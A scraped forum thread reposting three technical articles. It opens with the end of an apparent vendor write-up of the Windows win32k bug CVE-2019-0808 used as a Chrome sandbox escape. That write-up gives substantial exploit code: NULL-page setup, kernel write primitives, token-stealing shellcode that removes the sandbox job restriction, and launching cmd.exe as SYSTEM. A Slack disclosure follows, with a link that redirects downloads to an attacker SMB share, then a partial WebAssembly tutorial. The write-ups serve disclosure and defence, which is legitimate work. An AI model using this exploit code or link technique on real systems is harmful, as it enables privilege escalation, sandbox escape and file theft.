Validate the handle returned from the user // mode callback is a handle to a MFMWFP window. v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned // handle is a handle to // a window object. Set v1 to // TRUE if all is good. ... During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the value returned from xxxSendMessage() to ensure it the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex(). Setting up the Memory in the NULL Page Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately the following offsets need to be filled out: 0x20 0x34 0x4C 0x50 to 0x1050 This can be seen in more detail in the following diagram. NULL page utilization The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done as spMenu will be NULL at this point, so spMenu->cItems will contain the value at offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer will ensure that spMenu->cItems is greater than the value of pPopupMenu, which will prevent MNGetpItemFromIndex() from returning 0 instead of result. This can be seen on line 5 of the following code. tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu) { tagITEM *result; // eax if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur // here if spMenu is NULL. result = 0; else result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu; return result; } Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation shown on line 8 will set result to the address of primaryWindow‘s cbwndExtra field, minus an offset of 0x4. The other offsets require a more detailed explanation. The following code shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets. .text:BF975EA3 mov eax, [ebx+14h] ; EAX = ppopupmenu->spmenu .text:BF975EA3 ; .text:BF975EA3 ; Should set EAX to 0 or NULL. .text:BF975EA6 push dword ptr [eax+4Ch] ; uIndex aka pPopupMenu. This will be the .text:BF975EA6 ; value at address 0x4C given that .text:BF975EA6 ; ppopupmenu->spmenu is NULL. .text:BF975EA9 push eax ; spMenu. Will be NULL or 0. .text:BF975EAA call MNGetpItemFromIndex .............. .text:BF975EBA add ecx, [eax+28h] ; ECX += pItemFromIndex->yItem .text:BF975EBA ; .text:BF975EBA ; pItemFromIndex->yItem will be the value .text:BF975EBA ; at offset 0x28 of whatever value .text:BF975EBA ; MNGetpItemFromIndex returns. ............... .text:BF975ECE cmp ecx, ebx .text:BF975ED0 jg short loc_BF975EDB ; Jump to loc_BF975EDB if the following .text:BF975ED0 ; condition is true: .text:BF975ED0 ; .text:BF975ED0 ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG)) As can be seen above, a call will be made to MNGetpItemFromIndex() using two parameters: spMenu which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() will then be incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address will then be used to set pItemFromIndex->yItem, which will be utilized in a calculation to determine whether a jump should be taken. The exploit needs to ensure that this jump is always taken as it ensures that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner. To ensure this jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180. By then setting the bytes at offset 0x50 to 0x1050 within the NULL page to 0xF0 the attacker can ensure that regardless of the value that MNGetpItemFromIndex() returns, when it is incremented by 0x28 and used as a pointer to a DWORD it will result in pItemFromIndex->yItem being set to 0xF0F0F0F0. This will cause the first half of the following calculation to always be a very large unsigned integer, and henceforth the jump will always be taken. ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG)) Forming a Stronger Write Primitive by Using the Limited Write Primitive Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue. memset((void *)0x50, 0xF0, 0x1000); return (ULONG)hWndFakeMenu; After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below. v6 = xxxSendMessage( var_pPopupMenu->spwndNextPopup, MN_FINDMENUWINDOWFROMPOINT, (WPARAM)&pPopupMenu, (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the // MN_FINDMENUWINDOWFROMPOINT usermode callback // using the address of pPopupMenu as the // wParam argument. ThreadUnlock1(); if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user // mode callback is a handle to a MFMWFP window. v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned handle // is a handle to a window object. // Set v1 to TRUE if all is good. If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below. This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow‘s WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow. void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet) { ... var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write // operation should occur, minus an // offset of 0x4. temp_var_PITEM = var_PITEM; if ( var_PITEM ) { ... var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the // address where the second write operation // should occur, minus an offset of 0x4. This // address will be 0x6C bytes earlier in // memory than the address in var_PITEM. if ( fSet ) { *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the // attacker controlled address. if ( var_PITEM_Minus_Offset_Of_0x6C ) { *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u; // Conduct the second write to the attacker // controlled address minus 0x68 (0x6C-0x4). Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code. else { if ((cwp->message == 0x1E5)) { UINT offset = 0; // Create the offset variable which will hold the offset from the // start of hPrimaryWindow's cbwnd data field to write to. UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set // addressOfStartofPrimaryWndCbWndData to the address of // the start of hPrimaryWindow's cbwnd data field. // Set offset to the difference between hSecondaryWindow's // strName.Buffer's memory address and the address of // hPrimaryWindow's cbwnd data field. offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData); printf("[*] Offset: 0x%08X\r\n", offset); // Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16), // or the address of the bServerSideWindowProc bit. if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) { printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError()); ExitProcess(-1); } else { printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset)); } This code will start by checking if the window message was 0x1E5. If it was then the code will calculate the distance between the start of primaryWindow‘s wndExtra data section and the location of secondaryWindow‘s strName.Buffer pointer. The difference between these two locations will be saved into the variable offset. Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow‘s strName.Buffer pointer to the address of secondaryWindow‘s bServerSideWindowProc field. The effect of this operation can be seen in the diagram below. Using SetWindowLong() to change secondaryWindow’s strName.Buffer pointer By performing this action, when SetWindowText() is called on secondaryWindow, it will proceed to use its overwritten strName.Buffer pointer to determine where the write should be conducted, which will result in secondaryWindow‘s bServerSideWindowProc flag being overwritten if an appropriate value is supplied as the lpString argument to SetWindowText(). Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow‘s bServerSideWindowProc flag, SetWindowText() is called using an hWnd parameter of hSecondaryWindow and an lpString value of “\x06” in order to enable the bServerSideWindowProc flag in secondaryWindow. // Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer // field to set the bServerSideWindowProc bit in hSecondaryWindow. if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) { printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError()); ExitProcess(-1); } else { printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16)); The following diagram shows what secondaryWindow‘s tagWND layout looks like before and after the SetWindowTextA() call. Setting the bServerSideWindowProc flag in secondaryWindow with SetWindowText() Setting the bServerSideWindowProc flag ensures that secondaryWindow‘s window procedure, sprayCallback(), will now run in kernel mode with SYSTEM level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail. Effect of setting bServerSideWindowProc Stealing the Process Token and Removing the Job Restrictions Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message will be sent to hSecondaryWindow, as can be seen in the following code. printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n"); SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL); if (success == TRUE) { printf("[*] Successfully exploited the program and triggered the shellcode!\r\n"); } else { printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n"); ExitProcess(-1); } The WM_ENTERIDLE message will then be picked up by secondaryWindow‘s window procedure sprayCallback(). The code for this function can be seen below. // Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for // additional insight into how this function should operate. Note that a token stealing shellcode // is called here only because trying to spawn processes or do anything complex as SYSTEM // often resulted in APC_INDEX_MISMATCH errors and a kernel crash. LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { if (uMsg == WM_ENTERIDLE) { WORD um = 0; __asm { // Grab the value of the CS register and // save it into the variable UM. mov ax, cs mov um, ax } // If UM is 0x1B, this function is executing in usermode // code and something went wrong. Therefore output a message that // the exploit didn't succeed and bail. if (um == 0x1b) { // USER MODE printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n"); ExitProcess(-1); // Bail as if this code is hit either the target isn't // vulnerable or something is wrong with the exploit. } else { success = TRUE; // Set the success flag to indicate the sprayCallback() // window procedure is running as SYSTEM. Shellcode(); // Call the Shellcode() function to perform the token stealing and // to remove the Job object on the Chrome renderer process. } } return DefWindowProc(hWnd, uMsg, wParam, lParam); } As the bServerSideWindowProc flag has been set in secondaryWindow‘s tagWND object, sprayCallback() should now be running as the SYSTEM user. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, then inlined shellcode will ensure that sprayCallback() is indeed being run as the SYSTEM user. If this check passes, the boolean success is set to TRUE to indicate the exploit succeeded, and the function Shellcode() is executed. Shellcode() will perform a simple token stealing exploit using the shellcode shown on abatchy’s blog post with two slight modifications which have been highlighted in the code below. // Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1. // Essentially a standard token stealing shellcode, with two lines // added to remove the Job object associated with the Chrome // renderer process. __declspec(noinline) int Shellcode() { __asm { xor eax, eax // Set EAX to 0. mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData. // _KTHREAD is located at FS:[0x124] mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process mov ecx, eax // Copy current process _EPROCESS structure xor edx, edx // Set EDX to 0. mov DWORD PTR [ecx + 0x124], edx // Set the JOB pointer in the _EPROCESS structure to NULL. mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4 SearchSystemPID: mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink sub eax, 0B8h cmp [eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId jne SearchSystemPID mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token mov [ecx + 0xF8], edx // Assign SYSTEM process token. } } The modification takes the EPROCESS structure for Chrome renderer process, and NULLs out its Job pointer. This is done because during experiments it was found that even if the shellcode stole the SYSTEM token, this token would still inherit the job object of the Chrome renderer process, preventing the exploit from being able to spawn any child processes. NULLing out the Job pointer within the Chrome renderer process prior to changing the Chrome renderer process’s token removes the job restrictions from both the Chrome renderer process and any tokens that later get assigned to it, preventing this from happening. To better understand the importance of NULLing the job object, examine the following dump of the process token for a normal Chrome renderer process. Notice that the Job object field is filled in, so the job object restrictions are currently being applied to the process. 0: kd> !process C54 Searching for Process with Cid == c54 PROCESS 859b8b40 SessionId: 2 Cid: 0c54 Peb: 7ffd9000 ParentCid: 0f30 DirBase: bf2f2cc0 ObjectTable: 8258f0d8 HandleCount: 213. Image: chrome.exe VadRoot 859b9e50 Vads 182 Clone 0 Private 2519. Modified 718. Locked 0. DeviceMap 9abe5608 Token a6fccc58 ElapsedTime 00:00:18.588 UserTime 00:00:00.000 KernelTime 00:00:00.000 QuotaPoolUsage[PagedPool] 351516 QuotaPoolUsage[NonPagedPool] 11080 Working Set Sizes (now,min,max) (9035, 50, 345) (36140KB, 200KB, 1380KB) PeakWorkingSetSize 9730 VirtualSize 734 Mb PeakVirtualSize 740 Mb PageFaultCount 12759 MemoryPriority BACKGROUND BasePriority 8 CommitCharge 5378 Job 859b3ec8 THREAD 859801e8 Cid 0c54.08e8 Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable 859c6dc8 SynchronizationEvent To confirm these restrictions are indeed in place, one can examine the process token for this process in Process Explorer, which confirms that the job contains a number of restrictions, such as prohibiting the spawning of child processes. Job restrictions on the Chrome renderer process preventing spawning of child processes If the Job field within this process token is set to NULL, WinDBG’s !process command no longer associates a job with the object. 1: kd> dt nt!_EPROCESS 859b8b40 Job +0x124 Job : 0x859b3ec8 _EJOB 1: kd> dd 859b8b40+0x124 859b8c64 859b3ec8 99c4d988 00fd0000 c512eacc 859b8c74 00000000 00000000 00000070 00000f30 859b8c84 00000000 00000000 00000000 9abe5608 859b8c94 00000000 7ffaf000 00000000 00000000 859b8ca4 00000000 a4e89000 6f726863 652e656d 859b8cb4 00006578 01000000 859b3ee0 859b3ee0 859b8cc4 00000000 85980450 85947298 00000000 859b8cd4 862f2cc0 0000000e 265e67f7 00008000 1: kd> ed 859b8c64 0 1: kd> dd 859b8b40+0x124 859b8c64 00000000 99c4d988 00fd0000 c512eacc 859b8c74 00000000 00000000 00000070 00000f30 859b8c84 00000000 00000000 00000000 9abe5608 859b8c94 00000000 7ffaf000 00000000 00000000 859b8ca4 00000000 a4e89000 6f726863 652e656d 859b8cb4 00006578 01000000 859b3ee0 859b3ee0 859b8cc4 00000000 85980450 85947298 00000000 859b8cd4 862f2cc0 0000000e 265e67f7 00008000 1: kd> dt nt!_EPROCESS 859b8b40 Job +0x124 Job : (null) 1: kd> !process C54 Searching for Process with Cid == c54 PROCESS 859b8b40 SessionId: 2 Cid: 0c54 Peb: 7ffd9000 ParentCid: 0f30 DirBase: bf2f2cc0 ObjectTable: 8258f0d8 HandleCount: 214. Image: chrome.exe VadRoot 859b9e50 Vads 180 Clone 0 Private 2531. Modified 720. Locked 0. DeviceMap 9abe5608 Token a6fccc58 ElapsedTime 00:14:15.066 UserTime 00:00:00.015 KernelTime 00:00:00.000 QuotaPoolUsage[PagedPool] 351132 QuotaPoolUsage[NonPagedPool] 10960 Working Set Sizes (now,min,max) (9112, 50, 345) (36448KB, 200KB, 1380KB) PeakWorkingSetSize 9730 VirtualSize 733 Mb PeakVirtualSize 740 Mb PageFaultCount 12913 MemoryPriority BACKGROUND BasePriority 4 CommitCharge 5355 THREAD 859801e8 Cid 0c54.08e8 Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable 859c6dc8 SynchronizationEvent Examining Process Explorer once again confirms that since the Job field in the Chrome render’s process token has been NULL’d out, there is no longer any job associated with the Chrome renderer process. This can be seen in the following screenshot, which shows that the Job tab is no longer available for the Chrome renderer process since no job is associated with it anymore, which means it can now spawn any child process it wishes. No job object is associated with the process after the Job pointer is set to NULL Spawning the New Process Once Shellcode() finishes executing, WindowHookProc() will conduct a check to see if the variable success was set to TRUE, indicating that the exploit completed successfully. If it has, then it will print out a success message before returning execution to main(). if (success == TRUE) { printf("[*] Successfully exploited the program and triggered the shellcode!\r\n"); } else { printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n"); ExitProcess(-1); } main() will exit its window message handling loop since there are no more messages to be processed and will then perform a check to see if success is set to TRUE. If it is, then a call to WinExec() will be performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token. // Execute command if exploit success. if (success == TRUE) { WinExec("cmd.exe", 1); } Demo Video The following video demonstrates how this vulnerability was combined with István Kurucsai’s exploit for CVE-2019-5786 to form the fully working exploit chain described in Google’s blog post. Notice the attacker can spawn arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox. Code for the full exploit chain can be found on GitHub: https://github.com/exodusintel/CVE-2019-0808 Detection Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of “#32768”. Any user mode applications which exhibit this behavior are likely malicious since the class string “#32768” is reserved for system use, and should therefore be subject to further inspection. Mitigation Running Windows 8 or higher prevents attackers from being able to exploit this issue since Windows 8 and later prevents applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller’s 2012 BlackHat slidedeck), which means that attackers can’t allocate the NULL page or memory near the null page such as 0x30. Additionally upgrading to Windows 8 or higher will also allow Chrome’s sandbox to block all calls to win32k.sys, thereby preventing the attacker from being able to call NtUserMNDragOver() to trigger this vulnerability. On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page. Conclusion Developing a Chrome sandbox escape requires a number of requirements to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to make a working sandbox exploit from a bug in win32k.sys to illustrate the 0Day exploit chain originally described in Google’s blog post. The timely and detailed analysis of vulnerabilities are some of benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets. Sursa: https://blog.exodusintel.com/2019/05/17/windows-within-windows/
-
Stealing Downloads from Slack Users David Wells May 17 I’m going to go over an interesting feature abuse that could have been used to steal and even manipulate downloads from Slack users using the Slack desktop app on Windows. The vulnerability was reported to Slack via HackerOne based on our coordinated disclosure policy and Slack has patched this issue in one of its latest updates, v3.4.0. The vulnerability could have allowed a remote attacker to submit a masqueraded link in a slack channel, that “if clicked” by a victim, would silently change the download location setting of the slack client to an attacker owned SMB share. This could have allowed all future downloaded documents by the victim to end up being uploaded to an attacker owned file server until the setting is manually changed back by the victim. While on the attacker’s server, the attacker could have not only stolen the document, but even inserted malicious code in it so that when opened by victim after download (through Slack application), their machine would have been infected. This entire technique relied on how Slack treated clickable links and what was possible with certain slack:// links. We will go over some interesting applications of this attack. Changing Settings Slack is an Electron app, which makes reverse engineering quite easy for us. As a Slack user, one feature that I was already familiar with was the support for “slack://” hyperlinks. I figured this may be an interesting attack vector, so with some grepping I found the area of code that processes these protocol links. Looking at the functions, we can see an interesting one in protocol-link.ts module, which has the ability to change Slack app settings if clicked. We can find what available settings can be changed by looking in the Settings-Reducer.ts module, which contains all Slack settings. Nearly all of these settings are modifiable through slack://settings links. Download Location Hijack After researching all of the settings we can change, I found the most interesting setting reachable through a slack:// protocol handler was the “PrefSSBFileDownloadPath” setting. This changed the download destination path of a user. Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back). The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed. After setting up a remote SMB share, we could send users or channels a link that would redirect all downloads to it after they click the link. Once this is clicked, we can see that the change was successfully made in the advanced settings. If we now download a document… It is instead uploaded to this remote SMB share. Attack Vectors From a practical standpoint, the link text should be obscured as it looks sketchy on its own and savvy users probably won’t click it. There are a couple of options available for this. Authenticated Channel Member Researching Slack documentation, it didn’t appear to be possible to hyperlink words in a Channel at first: However, playing around with Slack API (and later seeing documentation for it), I found you could accomplish text hyperlinking through “attachments” feature. This can be accomplished by adding an “attachment” field to your slack POST request with appropriate fields: When this Slack message is submitted to a channel, it will now have hyperlinked “http://google.com” to my malicious slack link instead when clicked. When clicked, this will instantly change the victim’s Slack download location. Unauthenticated Channel Member This applies if we aren’t a member of a Slack channel. This is quite interesting as you may wonder…”Can we get our malicious link to enter into Slack channels we aren’t even a part of?” YES! It’s possible! This can be accomplished through RSS feeds. Slack channels can subscribe to RSS feeds to populate a channel with site updates which can contain links. Lets consider an example with reddit.com, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked. Once posted to this subreddit, our test Slack channel (that is subscribed to this subreddit feed), is now populated with the new article entry and previews the text which includes the link. There is a slight drawback to this technique however. When a victim clicked this link, the browser prompted a dialog such as the one seen below. The victim would have had to click “Yes,” which then instantly changes their Slack client’s download location. Final Thoughts This technique could be unmasked by savvy Slack users, however if decades of phishing campaigns have taught us anything, it’s that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting. Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. David Wells Sursa: https://medium.com/tenable-techblog/stealing-downloads-from-slack-users-be6829a55f63
-
Raw WebAssembly Putting the “Assembly” in “WebAssembly” A small WebAssembly module Loading a raw WebAssembly module Functions Memory Strings? Objects? What I left out AssemblyScript Conclusion Can you use the DOM in WebAssembly? Rust says yes, other people say no. Before we can resolve that disonnance, I need to shine some light on what raw WebAssembly can do. When you go to WebAssembly.org, the very first thing you see is that it’s a “stack-based virtual machine”. It’s absolutely not necessary to understand what that means, or even look at the WebAssembly VM specification to make good use of WebAssembly. This is not required reading. However, it can be helpful to have a deeper understanding of this ominous VM to understand what is within the capabilities of a WebAssembly module and what certain errors mean. Putting the “Assembly” in “WebAssembly” While WebAssembly is famously “Neither Web, Nor Assembly”, it does share some characteristics with other assembly languages. For example: The spec contains both a specification for the binary representation as well as a human-readable text representation. This text format is called “wat” and is short for “WebAssembly text format”. You can use Wat to hand-craft WebAssembly modules. To turn a Wasm module into Wat, or to turn a Wat file back into a Wasm binary, use wasm2wat or wat2wasm from the WebAssembly Binary Toolkit. A small WebAssembly module I am not going to explain all the details of the WebAssembly virtual machine, but just going through list a couple of short examples here that should help you understand how to read Wat. If you want to know more details, I recommend browsing MDN or even the spec. You can follow along on your own machine with the tools mentioned above, open the hosted version of the demos (linked under each example) or use WebAssembly.studio, which has support for Wat but also C, Rust and AssemblyScript. (; Filename: add.wat This is a block comment. ;) (module (func $add (param $p1 i32) (param $p2 i32) (result i32) local.get $p1 ;; Push parameter $p1 onto the stack local.get $p2 ;; Push parameter $p2 onto the stack i32.add ;; Pop two values off the stack and push their sum ;; The top of the stack is the return value ) (export "add" (func $add)) ) The file starts with a module expression, which is a list of declarations what the module contains. This can be a multitude of things, but in this case it’s just the declaration of a function and an export statement. Everthing that starts with $ is a named identifier and is turned into a unique number during compilation. These identifiers can be omitted (and the compiler will take care of the numbering), but the named identifiers make Wat code much easier to follow. After assembling our .wat file with wat2wasm, we can disassemble it again (for lols) with wasm2wat. The result is below. (module (type (;0;) (func (param i32 i32) (result i32))) (func (;0;) (type 0) (param i32 i32) (result i32) local.get 0 local.get 1 i32.add ) (export "add" (func 0)) ) As you can see, the named identifiers have disappeared and have been replaced with (somewhat) helpful comments by the disassembler. You can also see a type declaration that was generated for you by wat2wasm. It’s technically always necessary to declare a function’s type before declaring the function itself, but because the type is fully inferrable from the declaration, wat2wasm injects the type declaration for us. Within this context, function type declarations will seem a bit redundant, but they will become more useful when we talk about function imports later. Pro tip: Did you know that the “Source” panel in DevTools will automatically disassemble .wasm files for you? A function declaration consists of a couple of items, starting with func keyword, followed by the (optional) identifer. We also need to specify a list of parameters with their types, the return type and an optional list of local variables. The function body is itself a list of instructions for the VM’s stack. Using these instructions you can push values onto the stack, pop values off the stack and replace them with the result of an operation or load and store values in local variables, global variables or even memory (more about that later). A function must leave exactly one value on the stack as the function’s return value. Writing code for a stack-based machine can sometimes feel a bit weird. Wat also offers “folded” instructions, which look a bit like functional programming. The following two function declarations are equivalent: (func $add (param $p1 i32) (param $p2 i32) (result i32) local.get $p1 local.get $p2 i32.add ) (func $add (param $p1 i32) (param $p2 i32) (result i32) (i32.add (local.get $p1) (local.get $p2)) ) The export declaration can assign a name to an item from the module declaration and make it available externally. In our example above we exported the $add function with the name add. Loading a raw WebAssembly module If we compile our add.wat file to a add.wasm file and load it in the browser (or in node, if you fancy), you should see an add() function on the exports property of your module instance. <script> async function run() { const {instance} = await WebAssembly.instantiateStreaming( fetch("./add.wasm") ); const r = instance.exports.add(1, 2); console.log(r); } run(); </script> Live demo The compilation of a WebAssembly module can start even when the module is still downloading. The bigger the wasm module, the more important it is to parallelize downloading and compilation using instantiateStreaming. There is two pitfalls with this functions, though: Firstly, it will throw if you don’t have the right Content-Type header, so make sure you set it to application/wasm for all .wasm files. Secondly, Safari doesn’t support instantiateStreaming at all yet, so I tend to use this drop-in replacement: <script> async function maybeInstantiateStreaming(path, ...opts) { // Start the download asap. const f = fetch(path); try { // This will throw either if `instantiateStreaming` is // undefined or the `Content-Type` header is wrong. return WebAssembly.instantiateStreaming( f, ...opts ); } catch(_e) { // If it fails for any reason, fall back to downloading // the entire module as an ArrayBuffer. return WebAssembly.instantiate( await f.then(f => f.arrayBuffer()), ...opts ); } } </script> This is similar to what Emscripten does and has worked well in the past. Functions A WebAssembly module can have multiple functions, but not all of them need to be exported: ;; Filename: contrived.wat (module (func $add (; …same as before… ;)) (func $add2 (param $p1 i32) (result i32) local.get $p1 i32.const 2 ;; Push the constant 2 onto the stack call $add ;; Call our old function ) (func $add3 (param $p1 i32) (result i32) local.get $p1 i32.const 3 ;; Push the constant 3 onto the stack call $add ;; Call our old function ) (export "add2" (func $add2)) (export "add3" (func $add3)) ) Live demo Notice how add2 and add3 are exported, but add is not. As such add() will not be callable from JavaScript. It’s only used in the bodies of our other functions. WebAssembly modules can not only export functions but also expect a function to be passed to the WebAssembly module at instantiation time by specifying an import: ;; Filename: funcimport.wat (module ;; A function with no parameters and no return value. (type $log (func (param) (result))) ;; Expect a function called `log` on the `funcs` module (import "funcs" "log" (func $log)) ;; Our function with no parameters and no return value. (func $doLog (param) (result) call $log ;; Call the imported function ) (export "doLog" (func $doLog)) ) If we load this module with our previous loader code, it will error. It is expecting a function in its imports object and we have provided none. Let’s fix that: <script> async function run() { function log() { console.log("This is the log() function"); } const {instance} = await WebAssembly.instantiateStreaming( fetch("./funcimport.wasm"), { funcs: {log} } ) instance.exports.doLog(); } run(); </script> Live demo Running this will cause a log to appear in the console. We just called a WebAssembly function from JavaScript, and then we called a JavaScript function from WebAssembly. Of course both these function calls could have passed some parameters and have return values. But when doing that it’s important to keep in mind that JavaScript only has IEEE754 64-bit floats (“double”). Some types, like 64-bit integers, cannot be passed to JavaScript without loss in precision. Importing functions from JavaScript is a big puzzle piece on how Rust makes DOM operations possible from within Rust code with wasm-bindgen. This is of course glossing over some important and clever details and I’ll talk about those in a different blog post. Memory There’s only so much you can do when all you have is a stack. After all, the very definition of a stack is that you can only ever reach the value that is on top. So most WebAssembly modules export a chunk of linear memory to work on. It’s worth noting that you can also import a memory from the host environment instead of exporting it yourself. Whatever you prefer, you can only have exactly one memory unit overall (at the time of writing). This example is a bit contrived, so bear with me. The function add2() loads the first integer from memory, adds 2 to it and stores it in the next position in memory. ;; Filename: memory.wat (module ;; Create memory with a size of 1 page (= 64KiB) ;; that is growable to up to 100 pages. (memory $mem 1 100) ;; Export that memory (export "memory" (memory $mem)) ;; Our function with no parameters and no return value, ;; but with a local variable for temporary storage. (func $add2 (param) (result) (local $tmp i32) ;; Load an i32 from address 0 and put it on the stack i32.const 0 i32.load ;; Put the parameter on the stack and add the values i32.const 2 i32.add ;; Temporarily store the result in the parameter local.set $tmp ;; Store that value at address 4 i32.const 4 local.get $tmp i32.store ) (export "add2" (func $add2)) ) Note: We could avoid the temporary store in $p1 by moving the i32.const 4 to the very start of the function. Many people will see that as a simplification and most compilers will actually do that for you. But for educational purposes I chose the more imperative but longer version. WebAssembly.Memory is just a sequence of bits for storage. You have to decide how to read or write to it. That’s why there is a separate incarnation of store and load for each WebAssembly type. In the above example we are loading signed 32-bit integers, so we are using i32.load and i32.store. This is similar to how ArrayBuffers are just a series of bits that you need to interpret by using Float32Array, Int8Array and friends. To inspect the memory from JavaScript, we need to grab memory from our exports object. From that point on, it behaves like any ArrayBuffer. <script> async function run() { const {instance} = await WebAssembly.instantiateStreaming( fetch("./memory.wasm") ); const mem = new Int32Array(instance.exports.memory.buffer); mem[0] = 40; instance.exports.add(2); console.log(mem[0], mem[1]); } run(); </script> Live demo Strings? Objects? WebAssembly can only work with numbers as parameters. It can also only return numbers. At some point you will have functions where you’d want to accept strings or maybe even JSON-like objects. What do you do? Ultimately it comes down to an agreement how to encode these more complex data types into numbers. I’ll talk more about this when we transition to more high-level programming languages. What I left out There are a couple of things that WebAssembly 